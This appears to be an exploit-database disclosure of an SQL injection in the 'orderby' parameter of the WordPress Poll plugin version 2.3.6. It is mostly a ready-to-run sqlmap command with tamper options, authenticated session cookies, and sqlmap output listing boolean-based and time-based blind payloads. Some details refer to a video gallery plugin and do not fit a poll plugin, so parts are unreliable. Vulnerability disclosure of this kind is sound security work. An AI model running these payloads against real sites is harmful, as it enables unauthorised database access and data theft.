WordPress Poll 2.3.6 SQL Injection

Credit: tmrswrr
Risk: Medium
Local: No
Remote: Yes

# Exploit Title: WordPress Poll Plugin SQL Injection # Date: 2024-07-06 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://total-soft.com/wp-poll/ # Version 2.3.6 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `TS Poll > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1 ``` 2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc 3. Search for orderby parameter. ## SQLMAP COMMAND python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \ --batch \ --dbms=mysql \ --thread=10 \ --no-cast \ --random-agent \ -v 3 \ --tamper="between,randomcase,space2comment" \ --level=5 \ --risk=3 \ -p orderby \ --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472" ## RESULT --- Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) ---

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